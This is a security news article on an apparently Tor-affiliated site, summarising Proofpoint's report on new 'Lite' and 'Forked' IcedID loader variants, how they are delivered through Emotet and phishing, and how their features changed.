BTC $56772.0455
ETH $3229.2692
BNB $393.0365
SOL $106.6536
stETH $3224.6597
XRP $0.5621
ADA $0.6137
AVAX $38.6261
DOGE $0.0960
TRX $0.1415
wstETH $3753.2551
DOT $8.0619
LINK $18.8685
WETH $3222.5827
MATIC $1.0217
UNI $10.5943
WBTC $56672.8182
IMX $3.2827
ICP $12.8638
BCH $296.0952
LTC $73.4211
CAKE $3.1049
LEO $4.3751
ETC $27.6986
FIL $7.7121
KAS $0.1681
RNDR $7.1714
DAI $0.9992
HBAR $0.1085
ATOM $10.9103
INJ $37.3719
VET $0.0480
TON $2.1032
OKB $51.5043
FDUSD $1.0007
LDO $3.4620
STX $3.0518
XMR $133.5710
ARB $1.8885
XLM $0.1189
GRT $0.2844
TIA $16.9400
NEAR $3.9210
ENS $21.6903
MKR $2126.5962
WEMIX $2.0704
APEX $2.3723
BTC $56772.0455
ETH $3229.2692
BNB $393.0365
SOL $106.6536
stETH $3224.6597
XRP $0.5621
ADA $0.6137
AVAX $38.6261
DOGE $0.0960
TRX $0.1415
wstETH $3753.2551
DOT $8.0619
LINK $18.8685
WETH $3222.5827
MATIC $1.0217
UNI $10.5943
WBTC $56672.8182
IMX $3.2827
ICP $12.8638
BCH $296.0952
LTC $73.4211
CAKE $3.1049
LEO $4.3751
ETC $27.6986
FIL $7.7121
KAS $0.1681
RNDR $7.1714
DAI $0.9992
HBAR $0.1085
ATOM $10.9103
INJ $37.3719
VET $0.0480
TON $2.1032
OKB $51.5043
FDUSD $1.0007
LDO $3.4620
STX $3.0518
XMR $133.5710
ARB $1.8885
XLM $0.1189
GRT $0.2844
TIA $16.9400
NEAR $3.9210
ENS $21.6903
MKR $2126.5962
WEMIX $2.0704
APEX $2.3723
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Malicious revolution: IcedID changes tactics and becomes even more dangerous

    Learn about dangerous changes to IcedID and how to protect yourself from new threats.

    Proofpoint recently discovered new variants of IcedID malware. They do not feature IcedID's typical online banking fraud features, instead focusing on installing additional malware on compromised systems.

    Since the end of last year, new variants of IcedID have reportedly been used by 3 independent groups of attackers in attacks on 7 different campaigns. All attacks were aimed at delivering payloads, primarily ransomware.

    Proofpoint has identified two new variants of the IcedID bootloader: "Lite" (first appeared in November 2022) and "Forked" (first appeared in February 2023). Both loaders differ from the older versions of IcedID in their functionality and the modified payload delivery method.

    Removing unnecessary features in IcedID, which has been used in numerous malware campaigns without significant changes since 2017, makes malware more inconspicuous and compact, which can help attackers evade detection.

    Starting in November 2022, the "Lite" variant of the IcedID bootloader was delivered as a stage two payload after the device was infected with another notorious malware, Emotet.

    The "forked" version of the downloader first appeared in February 2023 and was distributed directly through thousands of personalized phishing emails with fake tax documents. These attacks used Microsoft OneNote attachments with the ".one" extension. The attachments were used to execute a malicious ".hta" file, which in turn launched PowerShell. Through it, IcedID itself was loaded from a remote resource. And the victim saw before his eyes only a PDF-bait, not noticing the background malicious activity.

    In late February, Proofpoint researchers observed a small-scale IcedID "Forked" campaign through fake email notifications from US agencies NHTSA and the FDA. As Proofpoint points out, while some attackers are using the new variants of the IcedID bootloaders, others still choose to deploy the standard variant, with one of the latest such campaigns recorded earlier this month.

    The "Forked" IcedID loader is very similar to the "Standard" version in terms of its role: sending basic host information to the C2 server and then getting the IcedID body itself. However, it uses a different file type and has an additional domain and string decryption code, making the payload 12 KB larger than the standard version. The "Lite" bootloader is 20 KB lighter and does not pass host information to the C2 server, as it is usually deployed in conjunction with Emotet, which itself profiles the compromised system.

    The "Forked" version of the IcedID bot itself is 64 KB smaller than the "Standard" version of the bot, and is basically the same malware minus the web injection system, AiTM (man in the middle) features, and the reverse connectivity capabilities that attackers have remote access to infected devices.

    The IcedID is typically used by attackers for initial access to the target device. The development of new variants is a worrying sign that indicates a shift towards bot specialization for payload delivery.

    Proofpoint predicts that the majority of attackers will continue to use the "Standard" version of the IcedID bootloader, but the deployment of newer versions will also increase, and more bootloader options may come later this year.

    Author DeepWeb
    New HinataBot botnet uses vulnerabilities in network equipment to carry out DDoS attacks
    Grouping BianLian excluded encryption from the chain of attacks

    Comments 0

    Add comment